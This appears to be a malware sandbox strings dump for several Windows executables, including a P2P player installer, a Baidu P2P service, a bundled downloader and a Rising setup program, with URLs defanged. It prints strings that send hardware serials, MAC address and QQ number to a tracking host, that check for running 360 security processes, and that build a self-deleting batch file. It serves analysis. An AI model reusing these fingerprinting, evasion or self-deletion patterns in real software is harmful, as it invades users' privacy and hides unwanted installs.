\Temp\nsf4.tmp\ioSpecial.ini
8-246WCGQ598DE}) i .r1 ?e
.2900.5512
m\LOCALS~1\Temp\nsf4.tmp
nfeng.exe
6.0.2900.5512
xianfeng.exe
"%Program Files%\xfplay\xianfeng.exe"
%Program Files%\xfplay
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\xfplay\xianfeng.exe
554304191
1.1.2.1
9.0.1 P2P

iexplore.exe_1676:

%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

BaiduP2PService.exe_472:

.text
`.rdata
@.data
.rsrc
<X%uk
t%SSSPj
SWSShX
D$%SP
tGHt.Ht&
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
.mixcrt
KERNEL32.DLL
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
kernel32.dll
127.0.0.1
do exit check, update available=%d
xbdyy is running, %d connections
ProcessRequest spend too much time to finish, Cmd=%d, time = %d ms
tcp peer closed
tcp connection error
API Call: Type = -
StartTask: h = 0x%p, r=%d
StopTaskAsync: h = 0x%p, r=%d
StopTaskSync: h = 0x%p, r=%d
FreeTaskHandle: h = 0x%p, r=%d
BatchOperation: h = 0x%p, r=%d
GetTask List,nRet=%d
CreateTask: h = 0x%p,r=%d
DelTempFile: %s\%s
DelResumeInfo: %s\%s
GetTaskInfo: h = 0x%p, Ret=%d, StatCode=%d, nDownload=%d
set playing task, handle = %u
set playing bitrate = %u
set download queue length = %u
set autoupdate on = %u
set lang id = %u
read length %d, bad boy, closed
Read nOff=I64i,nLength=d,nRet=%d
GET /config/status.html
HTTP/1.1 200 OK
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
[d-d-d d:d:d.d]
%%x
Resume Finish [%d]
pending request at pid=%I64i timeout %d, clear
pending request at pid=%I64i,uids=%I64i,%I64i, timeout=%d, cancel, elapse=%d,duplicate alloc %d
no retransmit 3,%d%%, tPending=%d
leave emergency, nSpeedTotal=%d, peer speed=%d, rank=%d
alloc no piece to %I64i, %d pending, %d partial, %d tail partial, blockset=%d
block done, remove reserve state : peer id=%I64i, blockid=%d
%I64i have %d
Acc got qid=%s, domain=%s
Acc got no qid, ret=%d, deny acc
XXXXXXXX
Acc got host=%u.%u.%u.%u:%u
XXX
GET %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: %u.%u.%u.%u:%u
Key: %s
%snOffset=%I64i,%d
%d.%d.%d.%d
Task ID = u
Peers Passive = i
Time Get Login = i ms
Time Login = i ms
Lan IP = %s
Wan IP = %s
%s : attention, read file buf the filesize is %I64i, nToRead=%I64i,index=%u
%s : attention, it should not be here,read at %I64u(%I64u), no data, return
%s : read at %I64u(%I64u), no data, return, index=%u, %I64i
%s : -------------------------------------------------- first buffering time=%d, DLed=%I64i
%s : ****************************************************** buffering time=%d
%s : read at %I64u(%I64u), return %i, available=%I64i, 0xx,0xx,0xx,0xx, index=%u,%I64i
%s : peer %s read callback at %I64u,%I64i,%I64i(%i), not ready
%s : peer %s read callback at %I64u(%i), ready
%s : DUP, uid=%I64i, pid=%d, kid=%I64i, total=%I64i
%s : DATA uid=%I64i, pid=%d, kid=%I64i, length=%I64i, avail=%I64i
add reserve state : peer id=%I64i, blockid=%d
REQ uid=%I64i, pid=%d, kid=%d
%s : delete task, index=%u
%s : start p2s, index=%u
%s : stop p2s, index=%u
%s : delete p2p task
%s : create share memory fail, error=%d
%s : start task, index=%u
%s : find resume file
%s : load resume file success
%s : file removed
%s : p2s finish code = %d
%s : filesize = %I64d, full hash length=%d
%s : no p2p fid, choose P2S
%s : no hash array
%s : send full hash done
%s : check url done, code=%d
%s : forbidden
%s : network error
%s : stop task, index=%u
%s : AddEmergencyRange(%I64i,%I64i) %I64i
%s : SetPriorityWindow(%I64i,%I64i)
%s : disk full
%s : create file error, error=%d
%s : rename fail
%s : rename success
%s : add p2p share
%s : task complete
%s : no hash array, need report to server
%s : zero hash at %i, rehash
%s : total verify success, report and add share
%s : total verify fail
%s : complete download ,but not complete verify, recheck
%s : send finish info, range count=%d,verified range=%I64i, total=%I64i
%s : create disk file fail
%s : try write hash piece failed: %I64i - %I64i
%s : memory verify success: %I64i(%I64i)
%s : memory verify fail: %I64i(%I64i)
%s : write piece success: %I64i - %I64i
%s : write piece fail: %I64i - %I64i
%s : disk verify success at %I64i(%i)
%s : disk verify fail at %I64i(%i)
%s : GetTaskInfo
%s : peers_add=%d, peers_total=%d, seeders=%d, downloaders=%d
%s : GetInternalState
%s : GetTaskStatistics
%s : GetBlockInfo
%d total,%I64i(%I64i), %d%%
%s : set task state, state=%d, error=%d
%s : set file size = %I64i
%s : load verify range at %I64i(%i)
%s : load data at %I64i(%i)
%s : on finish range,peer %I64i
%s : alloc %I64i-%I64i,peer %I64i
%s : p2s peer %I64i connected
%s : p2s peer %I64i leave
%s : p2s peer %I64i ready to request : %I64i-%I64i
%s : peer %I64i leave
recv calc verify response, block id=%d, from %I64i
crc at %I64i wrong piece %d, find bad boy
%s : may upload bad data, peer id=%I64i
%s : create p2p task fail, already exists
make a decision, for speed = %dKB/s > 150KB/s
make a decision, for elapse 10 seconds, speed = %dKB/s
choose P2S, P2S=%d KB/s, %s
choose P2P, P2S=%d KB/s
call delete_p2p_task, %u
dup url, url=%s
new task, url=%s
ref=%s
tmp=%s
the same task id %d
create task, index=%u
StopTaskAsync: %u
StopTaskSync: %u
fid=%s, url=%s
tasks.dat exist, do not check tasks.ini
read tasks.ini from %s
acctrack.kuaibo.com
acc.p2sp.baidu.com
0.0.0.0
dudpxp://
[DUDPXP]
index.html
%%%2X
hXXp://
PTF://
%s:%s@
%s%s%s%s%s
hXXp:///
hXXp://%s:%d/%s
cmp2s.p2sp.baidu.com
query?cmd=url2finfo
query?cmd=fid2finfo
query?cmd=validurl
commit?cmd=finfo
P2SCfg.ini
Port
%s %s HTTP/1.1
Content-Length: %d
d:\cygwin\home\scmpf\compiler_src\panfeng02_563106_win32\0\app\gensoft\p2p\client\platform\objs\BaiduP2PService.pdb
P2PBase.dll
?StatAdd@CP2PStatReport@@QAEX_K0@Z
?StatAdd@CP2PStatReport@@QAEX_KQAE@Z
?StatAdd@CP2PStatReport@@QAEX_KPAEI@Z
?SendReport@CP2PStatReport@@QAEHXZ
??1CP2PStatReport@@QAE@XZ
??0CP2PStatReport@@QAE@PBD000@Z
P2PStatReport.dll
P2SBase.dll
GetProcessHeap
KERNEL32.dll
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
OLEAUT32.dll
SHLWAPI.dll
WS2_32.dll
iphlpapi.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
WINTRUST.dll
VERSION.dll
GetConsoleOutputCP
GetCPInfo
.?AV?$FieldVector@VURL@p2s@@@serial@@
.?AVP2SValidUrl@p2s@@
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
g\Xbdyy.dll
\bdupdate.exe
\autoupdate.ini
\banner.jpg
\Baidu\BaiduPlayer\bdupdate.exe
\Baidu\BaiduPlayer\autoupdate.ini
\Baidu\BaiduPlayer\banner.jpg
\BaiduPlayer.exe
&Version=%d.%d.%d.%d
&LangID=%d
!\Cabinet.dll
@.exe
\bugreport.exe
bdbugreport_%u
CPU : Arch=%d, Type=%d, Level=%d, Rev=%d, No.=%d
MemoryPool : Total=%d, Free=%d
User : Lang=%d,LCID=%d ; System : Lang=%d,LCID=%d
Memory Corruption : %s
"%s" --smname=%s
CryptQueryObject failed with %x
CryptMsgGetParam failed with %x
Program Name : %s
Publisher Link : %s
MoreInfo Link : %s
CertFindCertificateInStore failed with %x
Signer Certificate:
TimeStamp Certificate:
Date of TimeStamp : d/d/d d:d
CertGetNameString failed.
Issuer Name: %s
Subject Name: %s
CryptDecodeObject failed with %x
The file "%s" is signed and the signature was verified.
The file "%s" is not signed.
An unknown error occurred trying to verify the signature of the "%s" file.
Error is: 0x%x.
\platform_%d.log
\platform.log
\platform_crush_%d.log
\platform_quit_%d.log
%sV%u
\running.pid
SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}
BaiduP2PService.exe
FTP://
HTTP://
\qqwry.dat
.bdre
.bdtp
\Baidu\BaiduPlayer\Service.ini
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNet
Global\f182cd1a-751e-4a90-9153-cbf3eb0e2040-mnbvcxzBDExit
f182cd1a-751e-4a90-9153-cbf3eb0e2040-zxcBDNetMutex
F=>%p, S=>%d
d\P2PBase.dll
\P2SBase.dll
\P2PStatReport.dll
\StatReport.exe
Global\0531f939-e126-410c-8e44-dc1c0b375a79_%u
BufferPercent=%d
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(%6.2f%%),S=I64i,Dup=%I64i(%6.2f%%),R=I64i,DV/MV/DE/ME=%d/%d/%d/%d,EM=%I64i,H=%u
State=,Error=,Peers==/=/=(=), Speed=d,DLed=I64i(00%%),S=I64i,Dup=%I64i(0.00%%),R=I64i,H=%u
Q=%d, FH=%d,P=%d, B=%d,P2P=%u,SCnt=%u,QDat=%dKB,QSta=%d,QSpe=%d,FID=%s Name=%s
Pending== Partial==/=, F=}/}/}, DT=%d, RC=%d,DA=%d, WP=%I64i,WD=%I64i
%6I64iK,%6I64iK,%s,AReq/ARes=%6u/%6u,RP=%d,LP=%d,RTT/RTO=M/M,W==,Q==,P==,LAN=%d,C=%d,R=-,NAT=-,V=MKB/s
WAdd=%u.%u.%u.%u:%u(%s)
LAddr=%u.%u.%u.%u:%u
EAddr=%u.%u.%u.%u:%u
Ver=%u.%u.%u.%u
Reserve=%d
UID=%I64i,Sta=%d,StaNext=%d,Retry=%d,MP=]/] KB,D=M/M KB/s,U=M/M KB/s,%s
Self:%s(%d),P2P:%s(%d),P2S:%s(%d),Stat:%s(%d),Tcps=-,Port=%u,Err=%u,Up=%d,Alloc==,Wr=M,Bitmap=-,WC==,AC==,RQ=-
\Baidu\BaiduPlayer\tasks.dat
\Baidu\BaiduPlayer\tasks.ini
field%d
\assfile.dll
\ManagerStub.dll
Test Fail, Error=%d, r2=%d
MyBDHotkey1
MyBDHotkey
MyBDHotkeyVer
CKernel32.dll
/commonlib.dll
%Program Files%\tools\BaiduP2PService.exe
"%Program Files%\tools\BaiduP2PService.exe"
Baidu.com, Inc.
1,0,14,43

QQPCDownload71960.exe_2776:

.text
`.rdata
@.data
.rsrc
aSSSh
FTPjK
FtPj;
C.PjRV
.mixcrt
KERNEL32.DLL
mscoree.dll
portuguese-brazilian
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
kernel32.dll
operator
GetProcessWindowStation
USER32.DLL
inflate 1.1.3 Copyright 1995-1998 Mark Adler
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
d:\QQPCDownloader_proj\PackageTools\product\win32\dbginfo\kpacket.pdb
KERNEL32.dll
USER32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
zcÁ
.?AUICryptoSetPassword@@
.?AVCCryptoGetTextPassword@N7z@NArchive@@
.?AUICryptoGetTextPassword@@
<assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Microsoft.Windows.HummerSetup" type="win32"></assemblyIdentity>
Hummer Setup EXE
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
%s%s_d_%x
setup.xml
A%s%s
%s_d_%x
%s%s%s
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe

MM-liao8863.exe_2808:

.text
`.rdata
@.data
.rsrc
SSSSh
FtPh
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
C:\Windows\Temp\temp.icon
c://temp.icon
ProExe
DownloadUrl
ErrorUrl
AdvertUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
<4,$?7/'
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceTypeModifier: x
RemovableMedia: %d
CommandQueueing: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
Drive%dType
DriveÜontrollerBufferSize
DriveÜontrollerRevisionNumber
Drive%dSerialNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
ERROR: Could not SetPriorityClass, LastError: %d
\\.\Scsi%d:
Hard Drive Model Number___________: %s
Hard Drive Serial Number__________: %s
%s (%s:%d)
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
softlist=%s&lmarkid=%s
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
w@C:\Windows\Temp\
%sDownLoad
_%s%s.exe
_%s.exe
/S /D=%s
%sDownLoad\%s
Browser=%s
&Resolution=%s&OS=%s&KEY=%s&Mac=%s&HardDrive=%s&CPU=%s&Graphics=%s
&Safe=%s&QQ=%s&Sougou=%s&Lmarkid=%s&Wmarkid=%s&Mtype=%s&tick=%d&flag=%s&status=%d&qqnumber=%s
&downloadtime=%d&setuptime=%d&downloadflag=%d&v=V1.9
hXXp://tj.9158.com/DownloadInsertinfo.aspx?
%ld%s%s
%d*%d
%s(%s)
...%d%c
%Program Files%
%s Inx:%d Offset:%d Len:%d
.tmp.tg
****ERR:%d,
nInx:%d, offset:%d, siz:%d
%d, lRemain
ConnectSvr:%s
X-X-X-X-X-X
SOFTWARE\%s
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003 R2
Microsoft Windows Server 2003
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2008
Microsoft Windows Vista
Microsoft Windows Server 2008 R2
Microsoft Windows 7
unknown OperatingSystem.
Web Edition
\StringFileInfo\xx\ProductVersion
\StringFileInfo\xx\ProductName
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
SOFTWARE\Microsoft\Windows NT\CurrentVersion
http\shell\open\command
%s %s
\SogouExe\SogouExe.exe
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sogou Input
%Program Files% (x86)\SogouInput\SogouExe\SogouExe.exe
%Program Files%\SogouInput\SogouExe\SogouExe.exe
M.exe
deepscan\zhudongfangyu.exe
360safe.exe
ZhuDongFangYu.exe
QQ.exe
T58web
9158web
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
HTTP/1.1
%s?log=%s&version=20140121
hXXp://tj.9158.com/logtest.aspx
:%d,server:%s, ip:%s,
:url:%s, server:%s,error msg:%s, errcode:%d
kernel32.dll
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
CHttpConnection
CHttpFile
hXXp://
WININET.DLL
HTTP/1.0
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
File%d
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
F%D,3
OLEACC.dll
SHLWAPI.dll
WSOCK32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
CreateDialogIndirectParamA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
ShellExecuteA
ShellExecuteExA
SHELL32.dll
COMCTL32.dll
oledlg.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
NETAPI32.dll
VERSION.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
HttpQueryInfoA
HttpSendRequestA
InternetOpenUrlA
HttpOpenRequestA
WININET.dll
.?AVCCmdTarget@@
.PAVCFileException@@
.?AV?$CList@PAVCFTPTask@@AAPAV1@@@
.PAVCException@@
.?AVCFTPTask@@
.?AVCHttpService@@
.?AVCMD5Checksum@@
.PAVCObject@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCInternetException@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCOleDispatchException@@
zcÁ
00000000000000000001
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe
`R.qB
h/y%DlRZ
J!Ç
<yB*.*
yR^y.%U3
/.Ro}!
p)%sQ
CZ%SY
.vyOx
.Pm[<
42a%u
O%fWU
%cPqt
F2/%c
C7%SQ5
XU%fR
QN.Ui
IßD
(Bô|
.Qsty
.bYV`
40%sS
%%co\s
P.WGD
2Um
%U2b&0
%se7sQ
[Q.QN]
4g%x=XL$5
.Bsw&wf
uÿQ
R#.oR
45.sSC
OBW2%S2%S2
u\%Cr@
.Pd4{
[K.On
W.eQYT
gB7%U
9~ui.QBv@
J.pEu
\.MdB
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
accKeyboardShortcut
mscoree.dll
ekernel32.dll
KERNEL32.DLL
DownloadInstall.Document
(*.*)
Output.prn$
(*.prn)|*.prn|
(*.*)|*.*||
1, 0, 0, 1
DownloadInstall.EXE

install1393485.exe_1148:

`.rsrc
\rsdebug.ini
c:\%s
dbghelp.dll
kernel32.dll
d-d-d(d-d-d)
Kernel32.dll
\rsmain.exe
[d-d-d][d:d:d:d]
%s\%s
%s\*.*
C:\Temp
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
\Rs7zSfx.log
\setup.dll
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
%s\CompsVer.inf
Setup.exe
%s\auto.ini
@Sleep...%d
%s Start
%s End
{E5C53971-D80E-4500-BE0D-761BF3CD8457}
Unsupported Method
Password is not defined
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
\NetConfig.ini
{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s",
"result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}
Label.dat
hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s
%sbase
Iphlpapi.dll
\\.\PhysicalDrive%d
\\.\Scsi%d:
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
Content-Type: application/x-www-form-urlencoded
HTTP/1.0
C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb
COMCTL32.dll
GDI32.dll
restorelog.txt
zcÁ
T3%dU
K.ZuNN
)$OI%f
B.Yo@
26.Ip
up.yF
~mM.Bv
qPndR.Ts
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
hXXp://sf.symcb.com/sf.crl0f
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXp://sf.symcd.com0&
hXXp://sf.symcb.com/sf.crt0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/rpa0
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
z.oao
].XcG
~jq.wz
.FDF`O
;.bd/
:U%SN
ej.CC
`X.UT?.
.lqwD
*e_!.sWI$`
]>!.gB
k.Rrt
TCP_yy
%S5]*
.fb#c$Z4
h[%D}_
$T.Ia
V.jurV
Sù,
T%xYS3
9kl.Uw
We]%F
u.zQ0
4\ R%d
.qJ4C9.
[email protected]
 y.Di
vJY.lNk'1
.Gi#O$@$
~D.Hh
U.LZe
yo.NRL;
.npr =
y/"Z.Jn(
Diurl
A.Ot=_d
.psd x
}.eNk^6E
@%X;g
~gq%c^
;.Aum
_6}"%_^&
36.hU
S}i;%u
$.dls
iY.Ub
%cUNX<
EHJJGA[.Oj
S.lW"
.hw1.
.CB5t
.MAF!
|%X3j
.aRSr
".xNT
3.Mh)
X2.Wq
B%.GMK
8&H8.VW
a%s%s
.dk:8e`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe
.text
`.rdata
@.data
.rsrc
@.reloc
QSVSSSh
>%uPV
|$D.tD
.tgPV
FTPjK
FtPj;
C.PjRVj
u.VV3
|$$vL9|$ u%Sh
Advapi32.dll
Explorer.exe
NtDll.dll
%d %d %d %d
Failed to call WTSQueryUserToken, err= 0x%x
wtsapi32.DLL
Could not open pipe
SetNamedPipeHandleState failed
\\.\pipe\RISING_RSD_BU
%*.*f
/RUNAS %s
Failed to load psapi.dll.
Psapi.dll
Setup.exe End with ErrorCode: 0xX
hXXp://center.rising.com.cn/LogCenter.asp?info=%s
Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s
Password
Port
%s\Data\%s\%s.ini
setup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
%s(%s)
ReportView
KERNEL32.DLL
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
ÞSKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
